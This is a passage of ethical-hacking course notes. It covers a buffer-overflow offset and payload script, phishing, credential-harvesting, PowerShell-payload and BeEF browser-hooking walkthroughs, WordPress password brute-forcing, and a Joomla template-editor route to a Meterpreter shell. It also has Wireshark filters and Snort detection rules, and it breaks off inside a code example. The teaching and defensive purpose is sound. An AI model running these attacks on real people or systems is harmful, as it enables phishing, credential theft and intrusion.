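The offset search above was done by hand with a hash string and two web tools. The following Python script, added here as an illustration (it is not part of the original notes), does the same steps programmatically: it generates a non-repeating pattern in the style of Metasploit's pattern_create.rb, turns the Exception Offset value into the four pattern characters that landed in EIP (the little-endian reversal), locates them to get the offset, and then assembles the junk + return-address buffer exactly as the Perl script does. The hash string and the values 35376239 and 00401316 are the ones from the notes; the function names are my own.

```python
import string
import struct

# The hex digest the notes used as a non-repeating string.
NOTES_PATTERN = ("1e66186a8e7f4a61ebaae3f46ae29b7520970ee1d605a28b3f55fe440002e44d"
                 "d919a774edde630a8eed58831cd0004cea5b3b7f4ed9c2b45b39e62b258d87ba")


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1Aa2...). No 4-byte window repeats
    within the first 20280 bytes, so the 4 bytes that land in EIP pin down one offset."""
    chunks, total = [], 0
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                total += 3
                if total >= length:
                    return "".join(chunks)[:length]
    raise ValueError("length exceeds the 20280-byte unique pattern")


def eip_to_fragment(eip_value):
    """The crash dialog prints EIP as a number, e.g. 0x35376239. x86 is little-endian,
    so those bytes sat in memory in reverse order: 39 62 37 35, i.e. the text '9b75'."""
    return struct.pack("<I", eip_value).decode("latin-1")


def pattern_offset(pattern, eip_value):
    """How many bytes of input are copied before the saved return address."""
    fragment = eip_to_fragment(eip_value)
    offset = pattern.find(fragment)
    if offset < 0:
        raise ValueError("EIP %#010x (%r) is not in the pattern" % (eip_value, fragment))
    return offset


def build_exploit(offset, ret_addr, junk=b"A"):
    """Junk up to the saved return address, then the new address packed little-endian."""
    return junk * offset + struct.pack("<I", ret_addr)


if __name__ == "__main__":
    off = pattern_offset(NOTES_PATTERN, 0x35376239)
    print("offset:", off)                      # 28, as found by hand above
    print("payload:", build_exploit(off, 0x00401316))
```

Note the trailing \x00 of the packed return address: because it is the last byte of the input it doubles as strcpy's terminator and is copied correctly. An address with a null byte anywhere but its last position would truncate the copy and could not be delivered through argv at all.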

----------------------------------------------



 SESSION 11
 ==========

SOCIAL ENGINEERING TOOLKIT (SET)
================================
The Social-Engineer Toolkit (SET) is an automated Python-based toolkit designed to perform attacks against the human element, and it comes pre-installed in Kali Linux. It is very easy to use: anyone with basic knowledge of Kali Linux and SET can deploy a social-engineering attack by choosing menu numbers and entering IP addresses, domain names and similar details.

WALKTHROUGH STEPS
=================

= Open Kali Linux; if it runs in a VM, make sure the network adapter is in Bridged mode so the victim can reach it.
= In the Terminal type > "setoolkit"
= This will show you options like these :
 The Social-Engineer Toolkit is a product of TrustedSec.
 Select from the menu:

 1) Social-Engineering Attacks
 2) Penetration Testing (Fast-Track)
 3) Third Party Modules
 4) Update the Social-Engineer Toolkit
 5) Update SET configuration
 6) Help, Credits, and About

 99) Exit the Social-Engineer Toolkit


ATTACK VECTORS
==============
1. Going through Web Attacks
 = By pressing 1 for "Social-Engineering Attacks" we get :
 Select from the menu:

 1) Spear-Phishing Attack Vectors
 2) Website Attack Vectors
 3) Infectious Media Generator
 4) Create a Payload and Listener
 5) Mass Mailer Attack
 6) Arduino-Based Attack Vector
 7) Wireless Access Point Attack Vector
 8) QRCode Generator Attack Vector
 9) Powershell Attack Vectors
 10) SMS Spoofing Attack Vector
 11) Third Party Modules

 99) Return back to the main menu.

 = Going for "2) Website Attack Vectors" :

 1) Java Applet Attack Method
 2) Metasploit Browser Exploit Method
 3) Credential Harvester Attack Method
 4) Tabnabbing Attack Method
 5) Web Jacking Attack Method
 6) Multi-Attack Web Method
 7) Full Screen Attack Method
 8) HTA Attack Method

 99) Return to Main Menu

 = Going with the Credential Harvester Attack, which clones a login page and records what the victim types into it :
 1) Web Templates
 2) Site Cloner
 3) Custom Import

 99) Return to Webattack Menu

 = Choose 2) Site Cloner (enter the URL of the site to clone) or 3) Custom Import (enter the path to your own page), then the IP address the harvester should listen on. When the victim submits the form, the POSTed fields appear in SET's output and in its report file.


2. Mass Mailer Attack
 = Selecting from 1) Social-Engineering Attacks, the next is 5) Mass Mailer Attack.
 = Select 2) Email Mass Mailer Attack
 = Create a mail list (one address per line) on the attacker's machine.
 = Give the path of the mail list
 = Select a Gmail account and enter the details.
 = Add the remaining details the mass mailer asks for (subject, body, etc.)
 = Use ^C when done, to send the mails.

3. Powershell Attack Vectors
 = Selecting from 1) Social-Engineering Attacks, the next is 9) Powershell Attack Vectors.
 = Select 1) Powershell Alphanumeric Shellcode Injector
 = Enter LHOST and LPORT
 = Go to the path where the PowerShell exploit file is saved, which is : "/root/.set/reports/powershell/"
 = Copy the text file and save it to the Desktop.
 = Change the extension from .txt to .bat .
 = Share the .bat file with the victim's PC.
 = Run the listener on the attacking machine.
 = Run the powershell.bat PAYLOAD file on the victim.
 = Get the Meterpreter session.

4. Spear Phishing
 = Selecting from 1) Social-Engineering Attacks, the next is 1) Spear-Phishing Attack Vectors.
 = Select 2) Create a FileFormat Payload.
 = Select a payload.
 = Enter the details needed to send the spear-phishing mails.
 = Trigger the victim.





BeEF FRAMEWORK
==============

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. BeEF is included in Kali Linux; it is started as a service and its control panel is opened with a web browser on the local machine. A victim's browser is "hooked" as soon as it loads BeEF's hook.js script, and from then on it can be driven from the framework.

STARTING UP BeEF FRAMEWORK
==========================
= Applications > Search BeEF > Click on "BeEF Start"
= It starts and opens in the browser on the localhost IP address and port 3000.
 http://127.0.0.1:3000/ui/panel
= First it shows an authentication page. The default credentials are beef:beef (change them in BeEF's config before using it against anyone).
 http://localhost:3000/ui/authentication

= Now we have to get the victim to open a page that loads the hook script from the attacker's IP, http://<attacker-ip>:3000/hook.js; once hooked, the browser is exploited further through the framework.

= The hooked browser shows up with its IP under "Online Browsers"; select it and go to the "Commands" tab for the available modules.


= Demo page to open in the victim's browser (it already includes the hook) : http://lhost:3000/demos/butcher/index.html   (replace lhost with the attacker's IP)

TIP : To get it opened in the victim's browser, use the QR Code attack vector from SET :)



4911
4912 SESSION 12
4913 ==========
4914
4915INTRODUCTION TO NESSUS
4916======================
4917
4918Nessus is one of the most popular and capable vulnerability scanners, it is an open-source network vulnerability scanner that uses the Common Vulnerabilities and Exposures architecture regarding all the CVE's , CWE's , CVSS Scores, NVT - Network Vulnerability Test Numbers and other architectures regarding all the Network Attacks. Nessus is a proprietary vulnerability scanner developed by Tenable Network Security. We will be covering up the installation, configuration steps, creating policies and maintainmg controls, starting a scan, and analyzing the reports using NESSUS Vulnerability Scanner.
4919It now costs $2,190 per year, which still beats many of its competitors. A free “Nessus Home” version is also available, though it is limited and only licensed for home network use. Nessus is constantly updated, with more than 70,000 plugins.
4920
4921
4922
4923How it works?
4924Nessus works by testing each port on a computer, determining what service it is running, and then testing this service to make sure there are no vulnerabilities in it that could be used by a hacker to carry out a malicious attack.
4925
4926
4927
4928
4929Nessus Plugins :
4930These programs are named plugins and are written in the Nessus Attack Scripting Language (NASL). The plugins contain vulnerability information, a simplified set of remediation actions and the algorithm to test for the presence of the security issue.
4931
4932
4933INSTALLAION AND CONFIGURATION
4934=============================
4935
4936= Downloading the Nessus home feed (free) or professional feed from the following link:
4937http://www.tenable.com/products/nessus/
4938
4939= Once you download the Nessus tool, you need to register with the Nessus official website to generate the activation key, which is required to use the Nessus tool. You can do it from the following link:(http://www.tenable.com/products/nessus/nessus-plugins/obtain-an-activation-code)
4940
4941= Click on “Nessus for Home” and enter the required details. An e-mail with an activation key will be sent to your mail.
4942
4943= Install the tool. (Installation of the Nessus tool will be quite confusing, so tutorials should be useful).For installation guidelines go to: (http://static.tenable.com/documentation/nessus_5.0_installation_guide.pdf).
4944
4945= Check for your operating system and follow the steps mentioned in the PDF.
4946Open Nessus in the browser; normally it runs on port 8834. The URL will be like : (http://localhost:8834/WelcomeToNessus-Install/welcome).
4947
4948= Create an account with Nessus. Entering the activation code you have obtained by registering with the Nessus website. Also you can configure the proxy if needed by giving proxy hostname, proxy username, and password.
4949
4950= Then the scanner gets registered with Tenable and creates a user.
4951
4952= Download the necessary plug-in. (It takes some time to download the plug-in; while you are watching the screen, you can go through the vast list of resources we have for Nessus users).
4953
4954= Once the plug-ins are downloaded, it will automatically redirect you to a login screen. Provide the username and password that you have created earlier to login.
4955
4956dpkg -i nesus.deb
4957follow the instructions terminal.
4958/etc/init.d/nessusd start > start
4959https://username:8834
4960
4961
4962----------------------------------------------------------
4963
4964
4965Key Features
4966=============
4967= Identifies vulnerabilities that allow a remote attacker to access sensitive information from the system.
4968= Checks whether the systems in the network have the latest software patches
4969= Tries with default passwords, common passwords, on systems account
4970= Configuration audits
4971= Vulnerability analysis
4972= Mobile device audits - BYOD
4973= Customized reporting
4974= For more details on the features of Nessus, visit: http://www.tenable.com/products/nessus/nessus-product-overview/nessus-features.
4975
4976
4977NESSUS SCANS
4978============
4979
4980Host Discovery : This can will let us know about all the connected nodes or devices in the same network. Hence in blackbox testing it wil be very useful to know how many machines are there in scope to test.
4981
4982Basic Scan : Basic scan will give you details which are not dat in detail but they are enough you understand the basic security architeure of the device on which we are doing the scan.
4983
4984Advance Scan : Includes dynamic approach with custom policy and rules to scan on the target. Hence we can proceed with any cutomized scan on any deviceto get a desired result report based on our selected parameters. In this advance scan we can actualy input what to do and what to skip options too hence it will increase the scan speed along with the productivity by giving attention to only policies which are critical than the policies which are not buiness critical.
4985
4986Audit Cloud Instrastructure : Cloud based CMS and other buiness applications can be audit from Nessus.
4987
4988Internal PCI Network Scan : PCI DSS scan is a global payment gateway audit having controls to check the overall security of the implemented project to process the transactions internaly or externely for the organisation.
4989
4990Malware Scan : MDM(Mobile Device Management) Config Audit : MDM is implemented when companies using BYOD policy in the organisation.
4991
4992Including other scans like : Mobile Device Scan, Offline Config, Audit PCI Quarterly External Scan , Polciy Complaince Auditing, SCAP and OVAL Auditing, Web Application Tests etc. with other protection.
4993
4994
4995RUNNING NESSUS
4996===============
4997
4998Nessus gives you lots of choices when it comes to running the actual vulnerability scan. You’ll be able to scan individual computers, ranges of IP addresses, or complete subnets. There are over 1200 vulnerability plug-ins with Nessus, which allow you to specify an individual vulnerability or a set of vulnerabilities to test for. In contrast to other tools, Nessus won’t assume that explicit services run on common ports; instead, it will try to exploit the vulnerabilities.
4999
5000
5001PRACTICALS :
5002===========
5003Scanning the networks through :
5004
5005= Host Discovery
5006= Basic Scan
5007= Advanced Scan
5008
5009

 SESSION 13
 ==========

CMS
====

Content Management System
=========================
With a CMS you build a website by arranging ready-made elements rather than writing it by hand, so you do not need deep knowledge of HTML, JS, PHP, SQL and so on; a good command of the language you write in matters more.

WordPress is a CMS
==================

How to recognise that a site runs WordPress :

1. Wappalyzer (browser extension)
2. Append wp-admin or wp-login.php to the URL and see if a login page appears. Google dorks: inurl:wp-login OR inurl:wp-admin
3. Image and asset URLs contain "wp-content" (and scripts "wp-includes")
4. whatweb <url> fingerprints the web server and the application behind it.

Download WordPress - www.wordpress.org - version 4.8 was used in class

Example of a tell-tale upload path:
http://127.0.0.1/wordpress/wp-content/uploads/2017/11/bharat-210x300.jpg

Hacking into a WordPress website
================================

wpscan > Built-in Kali Linux tool for enumerating and scanning a WordPress site.

#wpscan

#wpscan --url 127.0.0.1/wordpress

#wpscan --url 127.0.0.1/wordpress --enumerate t (enumerate the installed themes)

#wpscan --url 127.0.0.1/wordpress --enumerate p (enumerate popular plugins)

#wpscan --url 127.0.0.1/wordpress --enumerate ap (enumerate ALL plugins)

#wpscan --url 127.0.0.1/wordpress --enumerate vp (enumerate vulnerable plugins)

#wpscan --url 127.0.0.1/wordpress --enumerate at (enumerate all themes)

#wpscan --url 127.0.0.1/wordpress --enumerate vt (enumerate vulnerable themes)

#wpscan --url 127.0.0.1/wordpress --enumerate u (enumerate usernames; WordPress leaks them through author archives and the REST API)

#wpscan --url 127.0.0.1/wordpress -U elliot -P /usr/share/wordlists/rockyou.txt (brute-force the password of user elliot with the rockyou wordlist, via wp-login.php or xmlrpc.php)


-----------------------------------------------------------------------------------------------------------

REMEDIES :
==========

= wp-login changer : Moves wp-admin / wp-login.php to another path, e.g. adminlogin.php. This only hides the login page; it does not hide the fact that the site runs WordPress and it does not stop user enumeration.
= Login Limiter : Limits the number of login attempts per IP (a plugin on the login page). This is what actually slows the brute-force step; strong passwords finish the job.
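What wpscan and the recognition checks above actually key on are a handful of fixed strings in the page source. The following Python function, added here as an example (it is neither from the notes nor from wpscan), fingerprints a page the same way: WordPress signals, version, theme and plugin names. It runs over constructed sample pages, one of them "hardened" with the remedies above, to show that renaming wp-login.php and deleting the generator tag still leaves the wp-content/wp-includes paths and the version string on core assets in place. The signal names, the regular expressions and the two core assets whose ?ver= carries the WordPress version are my choices.

```python
import re

# Signals that survive a renamed login page.
SIGNALS = {
    "wp-content path":  re.compile(r"/wp-content/", re.I),
    "wp-includes path": re.compile(r"/wp-includes/", re.I),
    "generator meta":   re.compile(r'<meta\s+name=["\']generator["\']\s+content=["\']WordPress', re.I),
    "REST API link":    re.compile(r'href=["\'][^"\']*/wp-json/?["\']', re.I),
}
# Version sources, in order of preference: the generator tag, then core assets whose ?ver= is the WordPress version.
GENERATOR_VERSION_RE = re.compile(r'content=["\']WordPress\s+([\d.]+)', re.I)
CORE_ASSET_VERSION_RE = re.compile(
    r"/wp-includes/(?:js/wp-emoji-release\.min\.js|css/dashicons\.min\.css)\?ver=([\d.]+)", re.I)
THEME_RE = re.compile(r"/wp-content/themes/([A-Za-z0-9_-]+)/", re.I)
PLUGIN_RE = re.compile(r"/wp-content/plugins/([A-Za-z0-9_-]+)/", re.I)


def fingerprint_wordpress(html):
    """What a scanner learns from a single page: WordPress or not, version, theme, plugins."""
    signals = [name for name, rx in SIGNALS.items() if rx.search(html)]
    version = None
    for rx in (GENERATOR_VERSION_RE, CORE_ASSET_VERSION_RE):
        m = rx.search(html)
        if m:
            version = m.group(1)
            break
    theme = THEME_RE.search(html)
    return {
        "is_wordpress": bool(signals),
        "signals": signals,
        "version": version,
        "theme": theme.group(1) if theme else None,
        "plugins": sorted(set(PLUGIN_RE.findall(html))),
    }


# Constructed pages for the demonstration (not captured from a real site).
SAMPLE_DEFAULT = """<!DOCTYPE html><html><head>
<meta name="generator" content="WordPress 4.8" />
<link rel="https://api.w.org/" href="http://127.0.0.1/wordpress/wp-json/" />
<link rel="stylesheet" href="http://127.0.0.1/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8" />
<link rel="stylesheet" href="http://127.0.0.1/wordpress/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.9" />
<script src="http://127.0.0.1/wordpress/wp-includes/js/jquery/jquery.js?ver=1.12.4"></script>
</head><body>
<img src="http://127.0.0.1/wordpress/wp-content/uploads/2017/11/bharat-210x300.jpg" />
<a href="http://127.0.0.1/wordpress/wp-login.php">Log in</a>
</body></html>"""

# The same site after the remedies above: generator tag removed, login page renamed.
SAMPLE_HARDENED = """<!DOCTYPE html><html><head>
<link rel="stylesheet" href="http://127.0.0.1/wordpress/wp-content/themes/twentyseventeen/style.css" />
<script src="http://127.0.0.1/wordpress/wp-includes/js/wp-emoji-release.min.js?ver=4.8"></script>
</head><body>
<a href="http://127.0.0.1/wordpress/adminlogin.php">Log in</a>
</body></html>"""

SAMPLE_NOT_WP = """<html><head><meta name="generator" content="Joomla! - Open Source Content Management" />
</head><body><a href="/administrator/">Admin</a></body></html>"""

if __name__ == "__main__":
    for label, page in (("default", SAMPLE_DEFAULT), ("hardened", SAMPLE_HARDENED), ("joomla", SAMPLE_NOT_WP)):
        print(label, fingerprint_wordpress(page))
```

The hardened page still yields "WordPress 4.8, theme twentyseventeen", which is exactly what wpscan --enumerate t reports; hiding the login page buys nothing against a scanner that never needed it.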


-----------------------------------------------------------------------------------------------------------




OPENVAS (REMOVED FROM COURSE CONTENT BECAUSE OF UNAVAILABILITY)

The OpenVAS (Open Vulnerability Assessment System) scanner is a comprehensive vulnerability assessment system that can detect security issues in all manner of servers and network devices. OpenVAS is updated through the Network Vulnerability Tests (NVT) feed. It is available in Kali 2.0 (2016). It is managed through the Greenbone Security Assistant web interface and is regularly listed among the best network scanning and report generation tools.

Scan Types :

= Full Scan: a full test of network, server and web application vulnerabilities.

= Web Server Scan: a more focused test for web server and web application vulnerabilities.

= WordPress Scan: tests for known WordPress vulnerabilities and web server issues.

= Joomla Scan: tests for known Joomla vulnerabilities and web server issues.


Running OpenVAS
===============

Requirements : Kali 2.0 (2016.1), Iceweasel browser, OpenVAS



 SESSION 14
 ==========

What Is a CMS?
==============

A Content Management System (CMS) is a system that lets you manage information easily and effectively. The information could be anything, from a simple article to a complex media library.
It is aimed at non-technical users and lets them organize content without the usual hassle. In any web-based application there are three basic operations
--> Add
--> Edit
--> Delete

Example: WordPress, Joomla, Drupal etc...


Joomla
======
Joomla is an open-source CMS that lets you publish web content and build powerful web applications.


WordPress and Joomla
--------------------
At the time of these notes (2018) WordPress was a multi-purpose content management system powering over 31% of all websites on the Internet (far more than just blogs).

Joomla was the second most popular content management system, powering around 3% of all websites on the Internet.


---> Functionality – WordPress calls these plugins, while Joomla calls them extensions.

---> Aesthetics – WordPress calls these themes, while Joomla calls them templates.


Installation Of Joomla (Setting Up Joomla)
==========================================
Step 1: visit https://downloads.joomla.org/cms/joomla3/3-7-1
Step 2: Download and extract it.
Step 3: Copy the folder to C:\xampp\htdocs
Step 4: Open it in the browser (http://localhost/Joomla/)
Step 5: Fill in the details on the first tab and click Next.
Step 6: Create a database for Joomla.
Step 7: Add a user and assign privileges on that database.
Step 8: Go to C:\xampp\htdocs\Joomla\installation\sql\mysql
Step 9: Open joomla.sql
Step 10: Change ENGINE=InnoDB to ENGINE=MyISAM (a common workaround when the installer's InnoDB tables fail to create on XAMPP's bundled MySQL)
Step 11: Save it, then click Next on the installer page
Step 12: Click Install
Step 13: Remove the installation folder, otherwise the setup opens again next time
Step 14: We get two interfaces: the index (front) page visible to users, and the admin panel
Step 15: Visit both, log in to the admin page, then go to Extensions ---> Templates ---> protostar ----> open the details of this template (the template editor lets an administrator edit PHP files, which is the foothold used next)
Step 16: Open index.php
Step 17: Open Kali, create a PHP payload with msfvenom (as in the PHP shell step above), save it to a file and start the listener
Step 18: Copy the upload script from: https://github.com/t3rabyt3/Gravy-Uploader
Step 19: Paste it into index.php, i.e. replace the template's code with it
Step 20: Refresh the user-facing page
Step 21: An upload form appears; upload the payload file created in Step 17.
Step 22: Open the uploaded file (the malicious PHP with the payload embedded) on the server to run it
Step 23: The script runs and on the other side we get the Meterpreter session.
Step 24: ENJOY ... :)

TIP : None of this needs an unpatched bug. An administrator account that can edit template PHP is already remote code execution, so the admin credentials and the template editor are what to protect.


Exploiting Joomla
=================

Tools in use :
- JoomScan
- Dirb
- Nikto
- Uniscan

JoomScan : OWASP project for fingerprinting Joomla websites (version, components, known vulnerabilities).
 Usage : joomscan --url "TargetUrl"
 joomscan --url "TargetUrl" -ec      (also enumerate the installed components)

DIRB - Directory brute-force tool: finds sub-directories and files of a web server from a wordlist.
 Usage : dirb targeturl

NIKTO - Vulnerability assessment tool for web servers.
 Usage : nikto -h TargetUrl

Uniscan - All-in-one scanner for a web application.
 Usage : uniscan -u targeturl -qweds   (q: directory checks, w: file checks, e: robots.txt/sitemap.xml, d: dynamic checks, s: static checks)



 SESSION 15
 ==========

WIRESHARK
=========

Wireshark is a free, open-source protocol analyzer that lets you capture and view the data travelling back and forth on your network, with the ability to drill down into the contents of each packet, filtered to meet your specific needs.

Originally known as Ethereal, Wireshark features a user-friendly interface that can decode hundreds of different protocols on all major network types.

-----------------------------------------------------------------------------

WinPcap : the Windows packet-capture driver and library Wireshark uses to read from network interfaces (newer versions ship Npcap instead).
USBPcap : an add-on capture driver for Windows that lets Wireshark capture USB bus traffic.

------------------------------------------------------------------------------

Download : https://www.wireshark.org/download.html


Packet List :
=============

Time: The timestamp of when the packet was captured.

Source: The address (IP or other) where the packet originated.

Destination: The address the packet is being sent to.

Protocol: The packet's protocol name (e.g. TCP).

Length: The packet length, in bytes.

Info: Additional details about the packet. The contents of this column vary greatly depending on the protocol.



Filters (display filters, typed into the filter bar):
====================================================

Filtering on the basis of IP

= ip.addr == IPADDRESS

For filtering a particular source
1. ip.src == 192.168.43.43

For filtering a particular protocol
2. dns

Combining filters
3. dns && ip.src == 192.168.43.1

Filtering a particular destination
4. ip.dst == 192.168.43.43

Multiple sources, both conditions true
5. ip.src == 192.168.43.43 && ip.src == 192.168.43.1
 (a packet has exactly one source address, so this filter never matches anything; it is here to show the difference from ||)

Multiple sources, either condition true
6. ip.src == 192.168.43.43 || ip.src == 192.168.43.1

This address as either source or destination
7. ip.addr == 192.168.43.43

Not condition (hide this source)
8. !(ip.src == 192.168.43.43)

Multiple filters, both must be true because of &&
9. ip.src == 192.168.43.43 && !(ip.dst == 192.168.43.1)

Filtering packets on the basis of the data they contain
10. tcp contains "demo.testfire.net"

Filtering for form submissions, which is where passwords travel
11. http.request.method == "POST"
 (when the site is plain HTTP, the form fields in the POST body are readable in the packet bytes pane; that is the argument for HTTPS)


----------------------------------------------------------------------------



 SESSION 16
 ==========

Introduction to IDS | IPS | Honeypots
Network Security With Snort
Log Analysis
Honeypots and Attack Analysis


SECURITY MITIGATION PRODUCTS
============================

1. POINT PRODUCTS
 - FIREWALL
 - WAF
 - IDS
 - IPS
 - ANTIMALWARE
 - DMZ
 - HONEYPOTS

2. CONSOLIDATED PRODUCTS
 - UTM (UNIFIED THREAT MANAGEMENT SYSTEM)


IDS --> Intrusion Detection System | Service
=============================================
 A service that detects intrusions and other malicious activity by an attacker in the network and raises an alert. It watches a copy of the traffic (mirror port or tap), so it can see but not stop.
IPS --> Intrusion Prevention System | Service
==============================================
 Sits inline, in the path of the traffic, so once an intrusion is detected it can also act on it: drop the packet, reset the connection or block the source. The same engine (Snort, for example) can run in either mode.

IDS and IPS are known as the antivirus of the network --> they work at the network level.

They work on the headers and content of the packets transmitted in the network:
 Destination Port
 Source Port
 Services
 Data
 Signature
 Source IP Address
 Destination IP Address

SNORT --> One of the most widely deployed open-source IDS/IPS engines, used by corporates worldwide.
It works on rules that are matched against the packets.

For Installing SNORT
====================
 #apt-get install snort
For Checking the SNORT Version
==============================
 #snort -V
For Starting SNORT
==================
 #snort                                               (with no arguments this only sniffs and prints packets)
 #snort -c /etc/snort/snort.conf -i eth0 -A console   (IDS mode: load the config and its rules, listen on eth0, print alerts to the console)

Rule Files
==========
 /etc/snort/rules --> where all of Snort's rules are located.

PREDEFINED RULES

alert tcp $EXTERNAL_NET any -> $HOME_NET 79 (msg:"FINGER null request"; flow:to_server,established; content:"|00|"; reference:arachnids,377; classtype:attempted-recon; sid:324; rev:5;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 21
(msg:"FTP MDTM overflow attempt"; flow:to_server,established; content:"MDTM"; nocase; isdataat:100,relative; pcre:"/^MDTM\s[^\n]{100}/smi"; reference:bugtraq,9751; reference:cve,2001-1021; reference:cve,2004-0330; reference:nessus,12080; classtype:attempted-admin; sid:2546; rev:5;)

Format For Creating Snort Rules
===============================
Basic Rule Syntax
-----------------
 Action Protocol SourceIPAddress SourcePortNumber DirectionOfFlow DestinationIPAddress DestinationPortNumber (Body;)

alert tcp any any -> any any (msg:"Sample Alert"; sid:1000000; rev:1;)

The Rule Header
---------------
 Action (alert, log, pass; in inline mode also drop, reject, sdrop)
 Protocol (tcp, udp, icmp, ip; "any" is not a valid protocol, use ip to match every protocol)
 Source IP Address --> from where the data originates
 Source Port Number --> port number on the source device
 Direction Operator --> ("->" - unidirectional, "<>" - bidirectional)

 <>

 Destination IP Address --> to which IP address the data is going
 Destination Port Number --> to which port the session is made

Source and Destination IP Address can be variables
==================================================
 1. $EXTERNAL_NET --> any external IP address, outside the organisation (set in snort.conf, usually as !$HOME_NET).
 2. $HOME_NET --> any IP address of the internal organisation or intranet (set in snort.conf with ipvar HOME_NET).

Source IP Address
=================
1. If I want to make it specific --> instead of any, give an IP address
 alert ip 192.168.0.10 any -> $HOME_NET any (msg:"Vallari Mittal Is Again Attacking"; sid:1000001; rev:1;)

2. If I want the source IP address to be the intranet
 alert ip $HOME_NET any -> any any (body;)

3. If I want the source IP address to be the Internet
 alert ip $EXTERNAL_NET any -> any any (body;)

The same goes for the destination IP address.

alert tcp any any <> any any (content:"www.facebook.com"; msg:"FACEBOOK ALERT KINDLY SEE"; sid:1000002; rev:1;)


alert tcp any any <> 192.168.0.14 22 (msg:"SSH ATTACK DETECTED"; sid:1000003; rev:1;)
 (the source port must be any: the SSH client connects from a random high port, so a rule with 22 on both sides would never fire)

Every option is written name:value and ends with ';', the msg text goes in double quotes, and every rule needs a unique sid. Local rules use sids from 1000000 upwards so they never clash with the official rule set.

We will create these rules and save them in /etc/snort/rules.
 imma.rules ---> rule file
But a new rule file is not loaded until it is referenced in Snort's configuration.
To load it we edit the Snort configuration file:
 /etc/snort/
 /etc/snort/snort.conf      --> add the line: include $RULE_PATH/imma.rules
Then validate the configuration before running it: snort -T -c /etc/snort/snort.conf

Types Of Rule Options
=====================
There are 5 groups of rule options
 1. Metadata (general: msg, sid, rev, reference, classtype)
 2. Payload detection (content, nocase, pcre, isdataat)
 3. Non-payload detection (flow, flags, ttl, dsize)
 4. Post-detection (logto, session, react)
 5. Thresholding and suppression (event filters)
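To show what the header fields and the content: option do, here is a small Python matcher, added as an example (it is not Snort and not from the notes), that parses the rules written above and runs constructed packets through them. It evaluates the header (action, protocol, $HOME_NET / $EXTERNAL_NET, negation, port ranges, -> versus <>) and content: including the |hex| notation; flow:, pcre: and the rest of the option set are parsed but not evaluated. The HOME_NET value, the local sids and the packet fields are assumptions made for the demonstration.

```python
import ipaddress
import re

# Assumed values for the two snort.conf variables used in the rules above (ipvar HOME_NET ...).
IPVARS = {"$HOME_NET": "192.168.0.0/24", "$EXTERNAL_NET": "!192.168.0.0/24"}

HEADER_RE = re.compile(
    r"^(?P<action>alert|log|pass|drop|reject|sdrop)\s+"
    r"(?P<proto>tcp|udp|icmp|ip)\s+"                 # "any" is not a protocol: such a rule fails to parse
    r"(?P<src>\S+)\s+(?P<sport>\S+)\s+(?P<dir>->|<>)\s+"
    r"(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$")


def parse_rule(text):
    """Split a one-line rule into header fields plus an options dict (name -> list of values)."""
    m = HEADER_RE.match(text.strip())
    if not m:
        raise ValueError("malformed rule header: %r" % text)
    rule = m.groupdict()
    opts, buf, in_quotes = {}, [], False
    for ch in rule["opts"] + ";":                     # a final ';' closes the last option
        if ch == '"':
            in_quotes = not in_quotes
        if ch == ";" and not in_quotes:
            item, buf = "".join(buf).strip(), []
            if item:
                name, _, value = item.partition(":")
                opts.setdefault(name.strip(), []).append(value.strip().strip('"'))
        else:
            buf.append(ch)
    if "sid" not in opts:
        raise ValueError("rule has no sid: %r" % text)
    rule["opts"] = opts
    return rule


def ip_matches(spec, addr):
    """any, a single address, a CIDR list in [...] and a leading ! for negation."""
    spec = IPVARS.get(spec, spec)
    if spec == "any":
        return True
    negate = spec.startswith("!")
    nets = spec.lstrip("!").strip("[]").split(",")
    hit = any(ipaddress.ip_address(addr) in ipaddress.ip_network(n.strip(), strict=False) for n in nets)
    return hit != negate


def port_matches(spec, port):
    """any, a single port, a range such as 1:1024, 1024: or :1023, and a leading ! for negation."""
    if spec == "any":
        return True
    negate = spec.startswith("!")
    spec = spec.lstrip("!")
    if ":" in spec:
        lo, _, hi = spec.partition(":")
        hit = int(lo or 0) <= port <= int(hi or 65535)
    else:
        hit = port == int(spec)
    return hit != negate


def content_bytes(value):
    """Decode Snort content syntax: text with |hex| sections, e.g. 'USER |00|' -> b'USER \\x00'."""
    out = bytearray()
    for i, seg in enumerate(value.split("|")):
        out += bytes.fromhex(seg) if i % 2 else seg.encode()
    return bytes(out)


def rule_matches(rule, pkt):
    """Header and content: only; flow:, pcre:, isdataat: and the other options are not evaluated."""
    if rule["proto"] != "ip" and rule["proto"] != pkt["proto"]:
        return False

    def endpoints(src, sport, dst, dport):
        return (ip_matches(rule["src"], src) and port_matches(rule["sport"], sport)
                and ip_matches(rule["dst"], dst) and port_matches(rule["dport"], dport))

    forward = endpoints(pkt["src"], pkt["sport"], pkt["dst"], pkt["dport"])
    backward = rule["dir"] == "<>" and endpoints(pkt["dst"], pkt["dport"], pkt["src"], pkt["sport"])
    if not (forward or backward):
        return False
    nocase = "nocase" in rule["opts"]                 # simplification: applied to every content: in the rule
    payload = pkt["payload"].lower() if nocase else pkt["payload"]
    return all((content_bytes(v).lower() if nocase else content_bytes(v)) in payload
               for v in rule["opts"].get("content", []))


def run_rules(rules, pkt):
    """(action, sid, msg) for every rule the packet triggers."""
    return [(r["action"], r["opts"]["sid"][0], r["opts"].get("msg", [""])[0])
            for r in rules if rule_matches(r, pkt)]


RULES = [parse_rule(r) for r in (
    'alert tcp $EXTERNAL_NET any -> $HOME_NET 79 (msg:"FINGER null request"; flow:to_server,established; '
    'content:"|00|"; reference:arachnids,377; classtype:attempted-recon; sid:324; rev:5;)',
    'alert tcp any any <> any any (content:"www.facebook.com"; msg:"FACEBOOK ALERT KINDLY SEE"; sid:1000002; rev:1;)',
    'alert tcp any any <> 192.168.0.14 22 (msg:"SSH ATTACK DETECTED"; sid:1000003; rev:1;)')]

# Constructed packets (dicts stand in for decoded frames).
PKT_FINGER_EXTERNAL = {"proto": "tcp", "src": "203.0.113.5", "sport": 40000,
                       "dst": "192.168.0.20", "dport": 79, "payload": b"root\x00\r\n"}
PKT_FINGER_INTERNAL = dict(PKT_FINGER_EXTERNAL, src="192.168.0.30")
PKT_SSH_REPLY = {"proto": "tcp", "src": "192.168.0.14", "sport": 22, "dst": "10.0.0.5",
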